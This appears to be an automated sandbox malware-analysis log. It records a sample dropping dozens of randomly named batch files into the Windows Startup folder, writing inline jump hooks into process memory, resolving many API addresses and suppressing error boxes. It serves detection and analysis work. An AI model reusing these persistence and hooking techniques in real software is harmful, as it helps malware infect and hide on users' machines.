                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qjWESUwN5QphEhjbuV2RyE3e.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0tqRsZaQXhm54caqwDUXuMHC.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84qHSnAnloUyGTjudCcnx8X7.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tnYvJsdw6gVMo54pPIPOTk7f.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ra9dznGmjOHpZAiuMncAyjjm.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BN2W9TNO6kL3gJzRRzdUbTZg.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HpILK5HtW16MD0UJ7pzV1QPJ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yv6LDN6gTc8YJ8q14nqOwadt.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sS6m1zJ7SM7VOu619Ye9oRPC.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DJXmw8FbD4RPPXhLeAm8SoVJ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wfdWx9QBHbiX53OVW3ybKn3w.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cYTbNzYImrDYIx7DZ1mq8uju.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sPufcIhuWOPTECewJPFroVOs.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DCp8sgzWACD6Vy523F9IlcQB.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zEeQhGslvnDbo67JpIq1JJCf.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I1y6rl2pC8mUDNK8qfoy3mwi.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pc0fUYEqajLGUWQtn2ftxoqL.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\r0iR2ukaNLwNYvPx5HIxG52l.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MLlWxWjkKRHHt42qJxZpv3D4.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kjmIHqcSIrCufgz14qWPPLBs.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WRO1mDUXRTjz6psEJDnxyxnx.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QJOvieJeRHqxL1CkBVqLAHn4.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uh3nu45INFmWm7584kVwgFUO.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8U1eBzGHaaLerzhFHg9U9VIJ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6Lj2r8HjpXGeANxR3KECgncY.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\13YCUaamLsi0QOacTlyUtCF3.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tsbzRFmTsKBykEPO6dTSp6Bo.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X92VSFxhiRrhLMunkKi2h57u.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wpfphpa0v7Nt73NmqVDrheEB.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L66Dh4NdwdeMMxg3HjUpU2VV.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zf29JQFSkkWOPzBYpym8uJAy.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RSzAVr1FmnmbHDkLIrabhsTB.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wnPWh6gigyeyZklNGZd5SKHQ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZboQ6QzDUJYdvbmW1ugLygi3.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ERBtXO5ho7nmZoFsGYVG8xKj.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3rRyjClAJ2k30QIrWGpVFDpo.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XlekvkCI3kM0b7NtTDTdRwQu.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\913UuC1tRhVGy6AHxLqTaVLY.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UYav4djsSfeWrnxzOp8uz2JM.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5vz9LfAQRgiDqx5aIN1rUzgI.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7IdlNY4tr5xX5jsAv5Xm1aGP.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cg01RYFCgQ4yuUBvkQoejwXD.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ABVMMLQpGhcp1W2ujjO04sLV.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fQToSS9BPvVcS8w6eNfcK0kY.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7bW39nU2llZKhOZXueEFrfF.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8ywURDw7C6zMeRsof3kBXxpU.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pLcp1mMRVrfoftEu1oKo7EQU.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VoYUQzlIPy2CQ7auo8daNx7A.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oX3RgNofkgZNW1Os252HClux.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4ZYRf5dx7GqJx3l35fKvDZO8.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8dIzwG40mmQ7mxh4nJYR7fin.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bUvvEC4G93x8m0jMUV1cvbkw.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\791uKA04n6KFLHtwHnjK9hoV.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\y0CqVXQV0YSEnDiptPiHGIIC.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Kk0VS6Oeosw6tWUrpGI1GUiJ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hkdC1RojujX5k1DjwMZ3m53C.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwduwYkLXSb2GF3vux2rNkrk.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7k09nFNmfPaAV8TbITKMV0NQ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OMg9VYGhTMmOWOdpeinUzXxS.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wo1P9zhTUjnTlrOeTp1sTnJB.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xSB004NwHIjUzPebzxfgYy6M.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C6plKnC16OcysWG3iYxCicta.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JwleVm0kNOyDWRFneHiO7JF2.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H4kJahC6qjDEJs4KOlT9YrLj.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BKTdFTil10Rxbx2AcPfv4Wbu.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5FShBkGLSUEUFI9VFZ0ECdTf.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vrn34hmXrMXoIyvZRaTgjkg0.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yLrCNsFDaU7gI96DJGkskDGD.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ahtOSjAvEodBTLojg8tYK2oi.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RfoG22ZLMmZUJmI5a4966mOY.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\O8Kgv0druxTFfZsHOwjgYEle.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3JuqN9hvCAys7Gy6oZZoCzhT.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bBfUxqomlFONHrwoOa7bLerx.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JCpZnFr5MyYfVYa26BJ4tgNP.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\s43C8UHhQAcNSwRGxZag8EP2.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v6OAGPNLo8g4FxLeXUjM1mrW.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KPWcHmXzjov5ISLdPxDhZLCg.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ef27X2bsovEcForsSj11qs02.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pI9UCOqBrq3HW8eVihoQ9LjK.batJump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe | Memory written: PID: 7488 base: 7E0005 value: E9 2B BA 6F 76
Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe | Memory written: PID: 7488 base: 76EDBA30 value: E9 DA 45 90 89
Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe | Memory written: PID: 7488 base: 7F0008 value: E9 8B 8E 73 76
Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe | Memory written: PID: 7488 base: 76F28E90 value: E9 80 71 8C 89
Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe | Memory written: PID: 7488 base: 2AA0005 value: E9 8B 4D 5D 73
Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe | Memory written: PID: 7488 base: 76074D90 value: E9 7A B2 A2 8C
Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe | Memory written: PID: 7488 base: 2AB0005 value: E9 EB EB 5D 73
Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe | Memory written: PID: 7488 base: 7608EBF0 value: E9 1A 14 A2 8C
Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe | Memory written: PID: 7488 base: 2AC0005 value: E9 8B 8A AE 73
Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe | Memory written: PID: 7488 base: 765A8A90 value: E9 7A 75 51 8C
Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe | Memory written: PID: 7488 base: 2AD0005 value: E9 2B 02 B0 73
Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe | Memory written: PID: 7488 base: 765D0230 value: E9 DA FD 4F 8C
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: 4_2_00408761 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_00408761
Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
